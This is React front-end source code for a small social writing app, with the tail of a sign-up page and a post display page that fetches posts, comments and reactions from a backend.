<div className="flex-1 flex items-center justify-center sm:items-stretch sm:justify-start">
<div className="flex-shrink-0">
<img className="block lg:hidden h-8 w-auto" src={logo} alt="wK logo" />
<img className="hidden lg:block h-8 w-auto" src={logo} alt="wK logo" />
</div>
<div className="hidden sm:block sm:ml-6">
</div>
</div>
<div className="absolute inset-y-0 right-0 flex items-center pr-2 sm:static sm:inset-auto sm:ml-6 sm:pr-0">
<button className="p-1 border-2 border-transparent text-gray-400 rounded-full hover:text-white focus:outline-none focus:text-white focus:bg-gray-700 transition duration-150 ease-in-out" aria-label="Notifications">
{/* Heroicon name: bell */}
</button>
{/* Profile dropdown */}
<div className="ml-3 relative">
<div>
</div>
{/*
Profile dropdown panel, show/hide based on dropdown state.
Entering: "transition ease-out duration-100"
From: "transform opacity-0 scale-95"
To: "transform opacity-100 scale-100"
Leaving: "transition ease-in duration-75"
From: "transform opacity-100 scale-100"
To: "transform opacity-0 scale-95"
*/}
<div className="hidden origin-top-right absolute right-0 mt-2 w-48 rounded-md shadow-lg">
</div>
</div>
</div>
</div>
</div>
{/*
Mobile menu, toggle classes based on menu state.
Menu open: "block", Menu closed: "hidden"
*/}
<div className="hidden sm:hidden">
</div>
</nav>
<main className="profile-page">
<section className="relative block h-1/3" style={{ height: 300 + 'px' }}>
<div className="absolute top-0 w-full bg-center bg-cover">
<p className="text-white mt-6 text-3xl text-center">Sign Up</p>
<div className="flex mt-4 justify-center">
<div className="w-16 h-1 rounded-full bg-purple-500 inline-flex"></div>
</div>
<span id="blackOverlay" className="w-full h-full absolute opacity-50 bg-gray-900"></span>
</div>
</section>
<section className="relative py-24 bg-gray-800">
<div className="container mx-auto px-4">
<div
className="relative flex flex-col min-w-0 break-words bg-white w- mb-6 shadow-2xl rounded-lg -mt-64">
{/*<h1 className="mt-16 text-3xl font-semibold" style="padding-left: 5.5rem;">Sign Up</h1>*/}
<section className="text-gray-700 body-font relative px-5">
<div className="container px-5 mb-5 mx-auto flex sm:flex-no-wrap flex-wrap">
<div
className="lg:w-5/12 md:w-5/12 sm:w-5/12 bg-white flex flex-col md:ml-auto w-full md:py-8 mt-8 md:mt-0">
<p className="font-semibold text-lg mb-6 mt-2">Login Details</p>
<input
className="bg-white rounded border border-gray-400 focus:outline-none focus:border-purple-500 text-base px-4 py-2 mb-4 tracking-widest font-mono"
placeholder="Name" type="text" name="name" onChange={this.handleOptions} />
<input
className="bg-white rounded border border-gray-400 focus:outline-none focus:border-purple-500 text-base px-4 py-2 mb-4 tracking-widest font-mono"
placeholder="Email" type="email" name="email" onChange={this.handleOptions} />
<input
className="bg-white rounded border border-gray-400 focus:outline-none focus:border-purple-500 text-base px-4 py-2 mb-4 tracking-widest font-mono"
placeholder="Username" name="username" onChange={this.handleOptions} />
<input
className="bg-white rounded border border-gray-400 focus:outline-none focus:border-purple-500 text-base px-4 py-2 mb-4 tracking-widest font-mono"
placeholder="<PASSWORD>" type="<PASSWORD>" name="password" onChange={this.handleOptions} />
<p className="font-semibold text-lg mb-2 mt-2">About Me</p>
<p className="font-thin mb-4">A short description about yourself.</p>
<textarea
className="bg-white rounded border border-gray-400 focus:outline-none h-32 focus:border-purple-500 text-base px-4 py-2 mb-4 resize-none"
placeholder="Bio" name="bio" onChange={this.handleOptions}></textarea>
<div className="block">
<p className="font-semibold text-lg mb-2 mt-2">A few more things:</p>
<div className="mt-2">
<div>
<label className="inline-flex items-center">
<input type="checkbox" className="form-checkbox text-indigo-600" checked={this.state.isAboveEighteen} onChange={this.handleOptions} name="isAboveEighteen" />
<span className="ml-2 font-thin">I am more than 18 years old (for content tailoring)</span>
</label>
</div>
<p className="mt-4 mb-2">Privacy options</p>
<div>
<label className="inline-flex items-center">
<input type="checkbox" className="form-checkbox text-green-500" checked={this.state.showName} onChange={this.handleOptions} name="showName" />
<span className="font-thin ml-2">Show my name to others</span>
</label>
</div>
<div>
<label className="inline-flex items-center">
<input type="checkbox" className="form-checkbox text-pink-600" checked={this.state.showBio} onChange={this.handleOptions} name="showBio" />
<span className="font-thin ml-2">Show my bio to others</span>
</label>
</div>
</div>
</div>
<button
className="text-white bg-purple-500 border-0 mt-6 py-2 px-6 focus:outline-none hover:bg-purple-600 rounded text-lg" onClick={this.handleSubmit}>Sign Up</button>
<p className="text-xs text-gray-500 mt-3">By signing up, you agree with our <a
href="#" className="text-indigo-500 hover:text-indigo-800">terms of
service.</a></p>
</div>
{/* Interests */}
<div
className="lg:w-5/12 md:w-1/2 sm:w-5/12 sm:ml-10 bg-white flex flex-col md:ml-auto w-full md:py-8 mt-8 md:mt-0">
<p className="font-semibold text-lg mb-1 mt-2">Interests</p>
<p className="font-thin leading-5">Select the topics you're interested in.</p>
<p className="font-thin mb-4">This will help us personalize your feed.</p>
{/* Interest Cards */}
<InterestTag onCheck={() => this.addTag("prose")} onUncheck={() => this.removeTag("prose")} itemText="Prose" />
<InterestTag onCheck={() => this.addTag("poetry")} onUncheck={() => this.removeTag("poetry")} itemText="Poetry" />
<InterestTag onCheck={() => this.addTag("short_stories")} onUncheck={() => this.removeTag("short_stories")} itemText="Short stories" />
<InterestTag onCheck={() => this.addTag("compositions")} onUncheck={() => this.removeTag("composition")} itemText="Compositions" />
<InterestTag onCheck={() => this.addTag("idle_thoughts")} onUncheck={() => this.removeTag("idle_thoughts")} itemText="Idle thoughts" />
<InterestTag onCheck={() => this.addTag("jokes")} onUncheck={() => this.removeTag("jokes")} itemText="Jokes" />
<InterestTag onCheck={() => this.addTag("parody")} onUncheck={() => this.removeTag("parody")} itemText="Parody" />
<InterestTag onCheck={() => this.addTag("nature")} onUncheck={() => this.removeTag("nature")} itemText="Nature" />
</div>
</div>
</section>
<footer className="text-gray-500 bg-gray-900 body-font min-h-0">
<div className="container px-5 py-8 mx-auto flex items-center sm:flex-row flex-col">
<a className="flex title-font font-medium items-center md:justify-start justify-center text-white">
<img src={logo} className="h-10" />
</a>
{/*<p className="text-sm text-gray-600 sm:ml-4 sm:pl-4 sm:border-l-2 sm:border-gray-800 sm:py-2 sm:mt-0 mt-4">© 2020 tailblocks —
<a href="https://twitter.com/knyttneve" className="text-gray-500 ml-1" target="_blank" rel="noopener noreferrer">@knyttneve</a>
</p>*/}
<span className="inline-flex sm:ml-auto sm:mt-0 mt-4 justify-center sm:justify-start">
<a className="text-gray-600">
<svg fill="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
className="w-5 h-5" viewBox="0 0 24 24">
<path d="M18 2h-3a5 5 0 00-5 5v3H7v4h3v8h4v-8h3l1-4h-4V7a1 1 0 011-1h3z"></path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
className="w-5 h-5" viewBox="0 0 24 24">
<path
d="M23 3a10.9 10.9 0 01-3.14 1.53 4.48 4.48 0 00-7.86 3v1A10.66 10.66 0 013 4s-4 9 5 13a11.64 11.64 0 01-7 2c9 5 20 0 20-11.5a4.5 4.5 0 00-.08-.83A7.72 7.72 0 0023 3z">
</path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round"
stroke-width="2" className="w-5 h-5" viewBox="0 0 24 24">
<rect width="20" height="20" x="2" y="2" rx="5" ry="5"></rect>
<path d="M16 11.37A4 4 0 1112.63 8 4 4 0 0116 11.37zm1.5-4.87h.01"></path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="currentColor" stroke="currentColor" stroke-linecap="round"
stroke-linejoin="round" stroke-width="0" className="w-5 h-5" viewBox="0 0 24 24">
<path stroke="none"
d="M16 8a6 6 0 016 6v7h-4v-7a2 2 0 00-2-2 2 2 0 00-2 2v7h-4v-7a6 6 0 016-6zM2 9h4v12H2z">
</path>
<circle cx="4" cy="4" r="2" stroke="none"></circle>
</svg>
</a>
</span>
</div>
</footer>
</div>
</div>
</section>
</main>
</div>
<Snackbar open={this.state.successSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ successSnkOpen: false })}>
<Alert onClose={() => this.setState({ successSnkOpen: false })} severity="success">
{this.state.successText}
</Alert>
</Snackbar>
<Snackbar open={this.state.failedSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ failedSnkOpen: false })}>
<Alert onClose={() => this.setState({ successSnkOpen: false })} severity="error">
{this.state.errorText}
</Alert>
</Snackbar>
<Snackbar open={this.state.warnSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ warnSnkOpen: false })}>
<Alert onClose={() => this.setState({ warnSnkOpen: false })} severity="warning">
{this.state.warnText}
</Alert>
</Snackbar>
</div>
);
}
}
export default SignUpPage;<file_sep>import React from 'react';
import serverUrl from './appconfig';
import './css/build/tailwind.css';
import PopupMenuList from './PopupMenuList';
import Post from './Post';
import { Link } from 'react-router-dom';
import logo from './public/assets/logo.png';
import Button from '@material-ui/core/Button';
import TextField from '@material-ui/core/TextField';
import Dialog from '@material-ui/core/Dialog';
import DialogActions from '@material-ui/core/DialogActions';
import DialogContent from '@material-ui/core/DialogContent';
import DialogContentText from '@material-ui/core/DialogContentText';
import DialogTitle from '@material-ui/core/DialogTitle';
import Comment from './Comment';
import Snackbar from '@material-ui/core/Snackbar';
import MuiAlert, { AlertProps } from '@material-ui/lab/Alert';
function Alert(props) {
return <MuiAlert elevation={6} variant="filled" {...props} />
}
export default class PostDisplayPage extends React.Component {
constructor(props) {
super(props);
this.state = {
thisUserComment: ' ',
thisAnonymousComment: false,
thisUserPositiveComment: true,
sendVrToUsername: '',
vrDialogOpen: false,
comments: [
// Sample data
{
content: "Glossier echo park pug, church-key sartorial biodiesel vexillologist pop-up snackwave ramps cornhole. Marfa 3 wolf moon party messenger bag selfies, poke vaporware kombucha lumbersexual pork belly polaroid hoodie portland craft beer.",
postedbyUsername: "sachett",
anonymous: false
},
{
content: "Glossier echo park pug, church-key sartorial biodiesel vexillologist pop-up snackwave ramps cornhole. Marfa 3 wolf moon party messenger bag selfies, poke vaporware kombucha lumbersexual pork belly polaroid hoodie portland craft beer.",
postedbyUsername: "sachett",
anonymous: true
},
{
content: "Glossier echo park pug, church-key sartorial biodiesel vexillologist pop-up snackwave ramps cornhole. Marfa 3 wolf moon party messenger bag selfies, poke vaporware kombucha lumbersexual pork belly polaroid hoodie portland craft beer.",
postedbyUsername: "sachett",
anonymous: false
}
],
post: {
postedbyUsername: '(Loading...)',
title: '(Loading...)',
postedbyBio: '(Loading...)',
postedDate: '(Loading...)',
content: '(Loading...)',
anonymousPost: false,
nnegReactions: 0,
nposReactions: 0,
},
liked: null,
successSnkOpen: false,
failedSnkOpen: false,
warnSnkOpen: false,
errorText: '',
successText: '',
warnText: '',
};
this.handleOptions = this.handleOptions.bind(this);
this.handleWrite = this.handleWrite.bind(this);
}
componentDidMount() {
console.log("hey!");
console.log(this.props.location.query.fromFeed);
if (this.props.location.query.fromFeed == true)
fetch(serverUrl + "/posts/setseen", {
method: 'DELETE',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
userId: window.localStorage.getItem("wKuid"),
postId: this.props.location.query.postId,
})
})
fetch(serverUrl + '/posts/getpost?postId=' + this.props.location.query.postId, { method: 'GET' })
.then((response => response.json()))
.then((data) => {
console.log(data);
this.setState({
post: {
postedbyUsername: data.postedbyUsername,
content: data.content,
title: data.title,
postedDate: data.postedOn.toString(),
anonymousPost: data.anonymous,
nnegReactions: data.nnegReactions,
nposReactions: data.nposReactions
}
})
console.log(this.state.post.postedbyUsername);
// now get the author profile
fetch(serverUrl + '/users/getprofiledisplay?username=' + this.state.post.postedbyUsername)
.then((response) => response.json())
.then((data) => {
this.setState((state) => {
return {
post: {
postedbyUsername: state.post.postedbyUsername,
content: state.post.content,
title: state.post.title,
postedDate: state.post.postedDate,
anonymousPost: state.post.anonymousPost,
nnegReactions: state.post.nnegReactions,
nposReactions: state.post.nposReactions,
postedbyBio: data.showBio ? data.bio : '(Not permitted to be shown)'
}
}
})
// finally, get the comments too
this.retrieveComments()
});
});
}
retrieveComments() {
fetch(serverUrl + '/posts/getcomments?postId=' + this.props.location.query.postId)
.then((response) => response.json())
.then((data) => {
console.log(data);
this.setState({
comments: data
})
});
}
handleWrite() {
window.setTimeout(() => this.props.history.push('/write'), 10);
}
handleLike() {
if (this.state.liked != null) {
return;
}
fetch(serverUrl + '/posts/reacton', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
reactedbyUid: window.localStorage.getItem("wKuid"),
reactedonPid: this.props.location.query.postId,
reactionId: 1, // reaction id 1 is for like
})
}).then((response) => {
if (response.status == 200) {
this.setState((state) => {
return {
post: {
postedbyUsername: state.post.postedbyUsername,
content: state.post.content,
title: state.post.title,
postedDate: state.post.postedDate,
anonymousPost: state.post.anonymousPost,
nnegReactions: state.post.nnegReactions,
nposReactions: state.post.nposReactions + 1,
postedbyBio: state.post.bio,
liked: true,
},
successSnkOpen: true,
successText: 'You liked the post!',
}
});
}
else {
response.json()
.then((data) => {
if (data.reason == 'only_once') {
this.setState({
failedSnkOpen: true,
errorText: "You've reacted on this already!",
});
}
else {
this.setState({
failedSnkOpen: true,
errorText: "Failed to like!",
});
}
})
}
}).catch(() => {
this.setState({
failedSnkOpen: true,
errorText: 'Failed to like the post!',
});
});
}
handleDislike() {
if (this.state.liked != null) {
return;
}
fetch(serverUrl + '/posts/reacton', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
reactedbyUid: window.localStorage.getItem("wKuid"),
reactedonPid: this.props.location.query.postId,
reactionId: 2, // reactions id 2 is for dislike
})
}).then((response) => {
if (response.status == 200) {
this.setState((state) => {
return {
post: {
postedbyUsername: state.post.postedbyUsername,
content: state.post.content,
title: state.post.title,
postedDate: state.post.postedDate,
anonymousPost: state.post.anonymous,
nnegReactions: state.post.nnegReactions + 1,
nposReactions: state.post.nposReactions,
postedbyBio: state.post.bio,
liked: false,
},
warnSnkOpen: true,
warnText: 'You disliked the post.',
}
});
}
else {
response.json()
.then((data) => {
if (data.reason == 'only_once') {
this.setState({
failedSnkOpen: true,
errorText: "You've reacted on this already!",
});
}
else {
this.setState({
failedSnkOpen: true,
errorText: "Failed to dislike!",
});
}
})
}
}).catch(() => {
this.setState({
failedSnkOpen: true,
errorText: 'Failed to like the post!',
});
});
}
handlePostComment() {
console.log(this.state.thisAnonymousComment);
fetch(serverUrl + '/posts/commenton', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
content: this.state.thisUserComment,
isPositive: true,
isAnonymous: this.state.thisAnonymousComment,
postedbyUid: window.localStorage.getItem("wKuid"),
postedonPid: this.props.location.query.postId,
})
}).then((response) => {
if (response.status == 200) {
this.retrieveComments();
}
else {
this.setState({
failedSnkOpen: true,
errorText: 'Failed to comment!',
});
}
})
}
handleSavePost() {
console.log({
userId: window.localStorage.getItem("wKuid"),
postId: this.props.location.query.postId,
});
fetch(serverUrl + '/posts/savepost', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
userId: window.localStorage.getItem("wKuid"),
postId: this.props.location.query.postId,
})
}).then((response) => {
if (response.status == 200) {
this.setState({
successSnkOpen: true,
successText: 'Post saved to collection!',
});
}
else {
response.json()
.then((data) => {
if (data.reason == 'only_once') {
this.setState({
failedSnkOpen: true,
errorText: "You've saved this already!",
});
}
else {
this.setState({
failedSnkOpen: true,
errorText: "Failed to save to collection!",
});
}
})
}
})
}
handleSendVR() {
console.log({
postId: this.props.location.query.postId,
usernameToSend: this.state.sendVrToUsername,
sentbyUid: window.localStorage.getItem("wKuid")
});
fetch(serverUrl + '/users/sendviewrequest', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
postId: this.props.location.query.postId,
usernameToSend: this.state.sendVrToUsername,
sentbyUid: window.localStorage.getItem("wKuid")
})
}).then((response) => {
if (response.status == 200) {
this.setState({
successText: "View request sent!",
successSnkOpen: true,
vrDialogOpen: false,
})
}
else {
this.setState({
errorText: "Failed to send view request!",
failedSnkOpen: true,
vrDialogOpen: true,
})
}
})
}
handleOptions(event) {
const target = event.target;
const value = target.type === 'checkbox' ? target.checked : target.value;
const optionName = target.name;
this.setState(state => ({
[optionName]: value
}));
}
render() {
return (
<div className="flex flex-col bg-gray-800">
<div className="flex flex-col h-screen bg-gray-900">
<nav className="bg-gray-800">
<div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
<div className="flex items-center justify-between h-16">
<div className="flex items-center">
<div className="flex-shrink-0">
<img className="block lg:hidden h-8 w-auto" src={logo} alt="wK logo" />
<img className="hidden lg:block h-8 w-auto" src={logo} alt="wK logo" />
</div>
<div className="hidden md:block">
<div className="ml-10 flex items-baseline space-x-4">
<Link to="/feed" ><a href="#"
className="px-3 py-2 rounded-md text-sm font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Feed</a></Link>
<Link to="/savedPosts">
<a href="#"
className="px-3 py-2 rounded-md text-sm font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Saved Posts</a>
</Link>
<Link to="/seenPosts">
<a href="#"
className="px-3 py-2 rounded-md text-sm font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Seen Posts</a>
</Link>
</div>
</div>
</div>
<div className="hidden md:block">
<div className="ml-4 flex items-center md:ml-6">
{/*<button
className="p-1 border-2 border-transparent text-gray-400 rounded-full hover:text-white focus:outline-none focus:text-white focus:bg-gray-700"
aria-label="Notifications">
<svg className="h-6 w-6" stroke="currentColor" fill="none" viewBox="0 0 24 24">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
d="M15 17h5l-1.405-1.405A2.032 2.032 0 0118 14.158V11a6.002 6.002 0 00-4-5.659V5a2 2 0 10-4 0v.341C7.67 6.165 6 8.388 6 11v3.159c0 .538-.214 1.055-.595 1.436L4 17h5m6 0v1a3 3 0 11-6 0v-1m6 0H9" />
</svg>
</button>*/}
<button className="text-white bg-indigo-600 border-0 py-2 px-6 focus:outline-none hover:bg-indigo-700 rounded justify-center text-lg" onClick={this.handleWrite}>
Write
</button>
{/* Profile dropdown */}
<div className="ml-3 mt-1 relative">
<PopupMenuList name='User' onLogout={this.handleLogout} onVR={this.handleVR} onProfile={this.handleProfileSettings} />
</div>
</div>
</div>
<div className="-mr-2 flex md:hidden">
{/* Mobile menu button */}
<button
className="inline-flex items-center justify-center p-2 rounded-md text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:bg-gray-700 focus:text-white">
{/* Menu open: "hidden", Menu closed: "block" */}
<svg className="block h-6 w-6" stroke="currentColor" fill="none" viewBox="0 0 24 24">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
d="M4 6h16M4 12h16M4 18h16" />
</svg>
{/* Menu open: "block", Menu closed: "hidden" */}
<svg className="hidden h-6 w-6" stroke="currentColor" fill="none" viewBox="0 0 24 24">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
d="M6 18L18 6M6 6l12 12" />
</svg>
</button>
</div>
</div>
</div>
{/*
Mobile menu, toggle classes based on menu state.
Open: "block", closed: "hidden"
*/}
<div className='hidden'>
<div className="px-2 pt-2 pb-3 space-y-1 sm:px-3">
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-white bg-gray-900 focus:outline-none focus:text-white focus:bg-gray-700">Feed</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Team</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Projects</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Calendar</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-300 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Reports</a>
</div>
<div className="pt-4 pb-3 border-t border-gray-700">
<div className="flex items-center px-5 space-x-3" onClick={() => this.setState(state => ({ profileMenuOpen: !state.profileMenuOpen }))}>
<div className="flex-shrink-0">
<img className="h-10 w-10 rounded-full"
src="https://images.unsplash.com/photo-1472099645785-5658abf4ff4e?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=facearea&facepad=2&w=256&h=256&q=80"
alt="" />
</div>
<div className="space-y-1">
<div className="text-base font-medium leading-none text-white"><NAME></div>
<div className="text-sm font-medium leading-none text-gray-400"><EMAIL></div>
</div>
</div>
<div className="mt-3 px-2 space-y-1">
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Your
Profile</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Settings</a>
<a href="#"
className="block px-3 py-2 rounded-md text-base font-medium text-gray-400 hover:text-white hover:bg-gray-700 focus:outline-none focus:text-white focus:bg-gray-700">Sign
out</a>
</div>
</div>
</div>
</nav>
<main className="profile-page">
<section className="relative block h-1/3" style={{ height: 300 + 'px' }}>
</section>
<section className="relative py-24 bg-gray-800">
<div className="container mx-auto px-4">
<div
className="relative flex flex-col min-w-0 break-words bg-white w- mb-6 shadow-2xl rounded-lg -mt-80">
{/*<h1 className="mt-16 text-3xl font-semibold" style="padding-left: 5.5rem;">Sign Up</h1>*/}
<section className="text-gray-700 body-font relative px-5">
<div className="container px-5 mb-5 mx-auto flex sm:flex-no-wrap flex-wrap">
<div className=" bg-white flex flex-col md:ml-auto w-full">
<p className="text-4xl mb-1 mt-6">{this.state.post.title}</p>
<p className="font-thin text-xl mt-2 leading-5">By <span className="font-normal">{this.state.post.postedbyUsername}</span> on {this.state.post.postedDate} <span className="ml-6"></span>
<span
className="text-gray-600 mr-3 inline-flex items-center ml-auto leading-none text-sm pr-3 py-1 border-gray-800">
{/* Like, dislike view request buttons*/}
<button onClick={() => this.handleLike()}>
<svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M14 10h4.764a2 2 0 011.789 2.894l-3.5 7A2 2 0 0115.263 21h-4.017c-.163 0-.326-.02-.485-.06L7 20m7-10V5a2 2 0 00-2-2h-.095c-.5 0-.905.405-.905.905 0 .714-.211 1.412-.608 2.006L7 11v9m7-10h-2M7 20H5a2 2 0 01-2-2v-6a2 2 0 012-2h2.5">
</path>
</svg>
</button>{this.state.post.nposReactions}
<span className="ml-4"></span>
<button onClick={() => this.handleDislike()}>
<svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 14H5.236a2 2 0 01-1.789-2.894l3.5-7A2 2 0 018.736 3h4.018a2 2 0 01.485.06l3.76.94m-7 10v5a2 2 0 002 2h.096c.5 0 .905-.405.905-.904 0-.715.211-1.413.608-2.008L17 13V4m-7 10h2m5-10h2a2 2 0 012 2v6a2 2 0 01-2 2h-2.5">
</path>
</svg>
</button>{this.state.post.nnegReactions}
<span className="ml-4"></span>
<button onClick={() => this.setState({ vrDialogOpen: true })}>
<svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M8.684 13.342C8.886 12.938 9 12.482 9 12c0-.482-.114-.938-.316-1.342m0 2.684a3 3 0 110-2.684m0 2.684l6.632 3.316m-6.632-6l6.632-3.316m0 0a3 3 0 105.367-2.684 3 3 0 00-5.367 2.684zm0 9.316a3 3 0 105.368 2.684 3 3 0 00-5.368-2.684z"></path>
</svg>
</button>
<span class="ml-4" />
<button onClick={() => this.handleSavePost()}>
<svg class="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M5 5a2 2 0 012-2h10a2 2 0 012 2v16l-7-3.5L5 21V5z"></path></svg>
</button>
</span>
</p>
<div className="mt-4 leading-7">
<p className="text-lg font-normal mt-4">{this.state.post.content}</p>
</div></div>
</div>
<div className="w-full flex flex-col text-center md:text-left md:flex-row shadow border-indigo-50 mt-10 mb-10 p-6 rounded-lg">
<div className="flex-1 flex flex-col justify-center md:justify-start rounded-lg pb-4">
<p className="font-bold ml-4 text-2xl">Author</p>
<p className="font-semibold mt-4 ml-4 text-xl">{this.state.post.postedbyUsername}</p>
<p className="pt-2 ml-4">{this.state.post.postedbyBio}</p>
</div>
</div>
</section>
<footer className="text-gray-500 bg-gray-900 body-font min-h-0">
<div className="container px-5 py-8 mx-auto flex items-center sm:flex-row flex-col">
<div className="flex flex-col ml-4">
<p className="text-white text-4xl px-3">Comments</p>
<div className="w-full mt-8 px-4">
<textarea className="w-full bg-gray-800 rounded border border-gray-700 text-white focus:outline-none h-20 focus:border-blue-500 text-base px-4 py-2 resize-none block" placeholder="Post your comment" name="thisUserComment" onChange={this.handleOptions}></textarea>
</div>
<div className="grid lg:grid-cols-4 md:grid-cols-4 sm:grid-cols-1">
<label className="inline-flex items-center ml-6 mt-2">
<input type="checkbox" className="form-checkbox form-checkbox-dark text-indigo-600" onChange={this.handleOptions} name="thisAnonymousComment" />
<span className="ml-2 text-gray-400 font-thin">Anonymous</span>
</label>
<label className="inline-flex items-center ml-6 mt-3">
<input type="radio" className="form-radio form-radio-dark text-green-500" name="accountType" value="positive" />
<span className="ml-2">Positive</span>
</label>
<label className="inline-flex items-center ml-6 mt-3">
<input type="radio" className="form-radio form-radio-dark text-red-600" name="accountType" value="negative" />
<span className="ml-2">Negative</span>
</label>
<div className="p-2 w-full mt-3">
<button onClick={() => this.handlePostComment()} className="flex mx-auto text-white bg-blue-500 border-0 py-2 px-8 focus:outline-none hover:bg-blue-600 rounded text-lg">Post</button>
</div>
</div>
<section className="text-gray-500 bg-gray-900 body-font overflow-hidden">
<div className="container px-5 py-24 mx-auto">
<div className="-my-8">
{this.state.comments.map((comment) =>
<Comment content={comment.content}
postedbyUsername={comment.postedbyUsername}
anonymous={comment.anonymous} />
)}
</div>
</div>
</section>
</div>
</div>
</footer>
</div>
</div>
</section>
</main>
<footer className="text-gray-500 bg-gray-900 body-font min-h-0">
<div className="container px-5 py-8 mx-auto flex items-center sm:flex-row flex-col">
<a
className="flex title-font font-medium items-center md:justify-start justify-center text-white">
<img src={logo} className="h-10" />
</a>
{/*<p className="text-sm text-gray-600 sm:ml-4 sm:pl-4 sm:border-l-2 sm:border-gray-800 sm:py-2 sm:mt-0 mt-4">© 2020 tailblocks —
<a href="https://twitter.com/knyttneve" className="text-gray-500 ml-1" target="_blank" rel="noopener noreferrer">@knyttneve</a>
</p>*/}
<span className="inline-flex sm:ml-auto sm:mt-0 mt-4 justify-center sm:justify-start">
<a className="text-gray-600">
<svg fill="currentColor" stroke-linecap="round" stroke-linejoin="round"
stroke-width="2" className="w-5 h-5" viewBox="0 0 24 24">
<path
d="M18 2h-3a5 5 0 00-5 5v3H7v4h3v8h4v-8h3l1-4h-4V7a1 1 0 011-1h3z">
</path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="currentColor" stroke-linecap="round" stroke-linejoin="round"
stroke-width="2" className="w-5 h-5" viewBox="0 0 24 24">
<path
d="M23 3a10.9 10.9 0 01-3.14 1.53 4.48 4.48 0 00-7.86 3v1A10.66 10.66 0 013 4s-4 9 5 13a11.64 11.64 0 01-7 2c9 5 20 0 20-11.5a4.5 4.5 0 00-.08-.83A7.72 7.72 0 0023 3z">
</path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="none" stroke="currentColor" stroke-linecap="round"
stroke-linejoin="round" stroke-width="2" className="w-5 h-5"
viewBox="0 0 24 24">
<rect width="20" height="20" x="2" y="2" rx="5" ry="5"></rect>
<path d="M16 11.37A4 4 0 1112.63 8 4 4 0 0116 11.37zm1.5-4.87h.01">
</path>
</svg>
</a>
<a className="ml-3 text-gray-600">
<svg fill="currentColor" stroke="currentColor" stroke-linecap="round"
stroke-linejoin="round" stroke-width="0" className="w-5 h-5"
viewBox="0 0 24 24">
<path stroke="none"
d="M16 8a6 6 0 016 6v7h-4v-7a2 2 0 00-2-2 2 2 0 00-2 2v7h-4v-7a6 6 0 016-6zM2 9h4v12H2z">
</path>
<circle cx="4" cy="4" r="2" stroke="none"></circle>
</svg>
</a>
</span>
</div>
</footer>
</div>
<Snackbar open={this.state.successSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ successSnkOpen: false })}>
<Alert onClose={() => this.setState({ successSnkOpen: false })} severity="success">
{this.state.successText}
</Alert>
</Snackbar>
<Snackbar open={this.state.failedSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ failedSnkOpen: false })}>
<Alert onClose={() => this.setState({ successSnkOpen: false })} severity="error">
{this.state.errorText}
</Alert>
</Snackbar>
<Snackbar open={this.state.warnSnkOpen} autoHideDuration={2000} onClose={() => this.setState({ warnSnkOpen: false })}>
<Alert onClose={() => this.setState({ warnSnkOpen: false })} severity="warning">
{this.state.warnText}
</Alert>
</Snackbar>
<div>
<Dialog open={this.state.vrDialogOpen} onClose={() => { this.setState({vrDialogOpen: false}) }} aria-labelledby="form-dialog-title">
